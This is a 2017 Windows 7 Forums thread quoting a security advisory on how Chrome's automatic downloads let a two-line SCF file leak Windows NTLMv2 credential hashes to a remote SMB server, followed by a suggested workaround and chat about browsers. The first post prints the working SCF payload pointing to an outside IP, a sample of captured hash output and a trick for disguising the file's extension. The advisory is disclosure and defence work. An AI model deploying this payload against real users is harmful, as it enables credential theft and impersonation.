Windows 7 Forums

Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: Warning: Attackers can Steal Windows Credentials using Google Chrome

17 May 2017   #1
Brink

64-bit Windows 10 Pro
 
 
Warning: Attackers can Steal Windows Credentials using Google Chrome

Quote:
Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.

The Problem

With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?

Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like:

Code:
[Shell]
Command=2
IconFile=explorer.exe,3

[Taskbar]
Command=ToggleDesktop

As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet[3] but does not give the same treatment to SCF files.

SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:

Code:
[Shell]
IconFile=\\170.170.170.170\icon

Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon ".

The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:

Code:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201
ccf26d91cd9e326e00000000020000000000000000000000
The above example shows a disclosure of victim's username, domain and NTLMv2 password hash.

It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files...


Read more: DefenseCode - Home


My System SpecsSystem Spec
.
18 May 2017   #2
ThrashZone

Win-7-Pro64bit 7-H-Prem-64bit
 
 

Hi,
I didn't need a good reason not to install chrome but if I did this might just be it
My System SpecsSystem Spec
18 May 2017   #3
Brink

64-bit Windows 10 Pro
 
 

Checking the Ask where to save each file before downloading box is the recommended workaround for now.

Change Download Folder Location in Google Chrome for Windows Windows 10 Browsers Email Tutorials
My System SpecsSystem Spec
.

18 May 2017   #4
ThrashZone

Win-7-Pro64bit 7-H-Prem-64bit
 
 

Hi,
Yep I would normally do that anyway but chrome has java... and I just do not like it having stuff like that I do not need
My System SpecsSystem Spec
18 May 2017   #5
michael diemer

Windows 7 x64 SP1
 
 

I avoid all things Google like I avoid ticks, one of which I just pulled off of me. Gonna be a nasty summer up here in Maine. But back to the subject at hand, Google just reeks of privacy violations. Why anyone would have anything to do with it is beyond me, but then a sucker is born every minute, as they say. (Suckers are nasty too, gotta be careful if you go in the water).
My System SpecsSystem Spec
18 May 2017   #6
SCANNERMAN777

Windows 7 Ultimate, Windows 8.1 Pro, Linux Mint/Cinnimon (Triple Boot)
 
 

In a single word: CONVENIENCE. This is the argument my wife and I have over GOOGLE. I refuse to use it. She insists on using it for the "convenience". No way is that browser going on my new build. I'd rather use I.E. if it comes down to it. I wouldn't mind seeing BRAVE come to fruition but until then I'll be content with Fire Fox. It works well with Linux too.
My System SpecsSystem Spec
18 May 2017   #7
tetraps

Windows 7 Professional x64 SP1
 
 

Vivaldi is good, too. It is based on Chromium, and all Chrome apps work with it, but the browser itself allows a lot of customization. Made by former Opera devs I think.
My System SpecsSystem Spec
19 May 2017   #8
michael diemer

Windows 7 x64 SP1
 
 

Quote   Quote: Originally Posted by tetraps View Post
Made by former Opera devs I think.
Yes, I think that is right. I forget the details, but I don't believe it was an amicable parting. I like Vivaldi but find that it takes a while to open. After it does it is really fast. And yes you can customize it and make it look pretty.

I continue searching for the perfect browser. I've used Chromium, but it's close enough to Chrome to make me nervous. Firefox always ends up being the default, there's just nothing as robust, safe and stable. It's certainly good enough, and at the top of the list.
My System SpecsSystem Spec
19 May 2017   #9
Melchior

Windows 7 Ultimate SP1 x64 (v6.1.7601.23537)
 
 

Quote   Quote: Originally Posted by SCANNERMAN777 View Post
In a single word: CONVENIENCE. This is the argument my wife and I have over GOOGLE. I refuse to use it. She insists on using it for the "convenience". No way is that browser going on my new build. I'd rather use I.E. if it comes down to it. I wouldn't mind seeing BRAVE come to fruition but until then I'll be content with Fire Fox. It works well with Linux too.
Huway! Firefox FOREVER!! lol

I would NOT install Chrome if it was the last browser on the planet

my only problem with Firefox is the Devs are OUT of their MINDS... these days...

they are planning to SCRAP the XUL based extensions system for something they call web extensions which sucks royally

and XUL is what made FF so G.R.E.A.T.

so Firefox's FUTURE is looking pretty bleak now..
and I have been using Firefox since v2.0 wayy wayy back in the day...
My System SpecsSystem Spec
21 May 2017   #10
goodlad

windows 7 ultimate x32
 
 

I use Chrome daily only for professional work purposes I don't download any stuff through Chrome, all the downloads have to go through my FF, no exceptions.

For some reason other than Chrome, all the other browsers lack the proper customization for my work site. I can't change it either, that's my boss dev team's work.

FF has always been my go-to-browser since 2005 or 2006. My dad loved to use Netscape Navigator the most back then. My pref was either FF or Opera. I don't like the present lite version of Opera, I still have the old build one of the heavy pack.
My System SpecsSystem Spec
Reply

 Warning: Attackers can Steal Windows Credentials using Google Chrome




Thread Tools



Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd

All times are GMT -5. The time now is 01:25.
Twitter Facebook Google+ Seven Forums iOS App Seven Forums Android App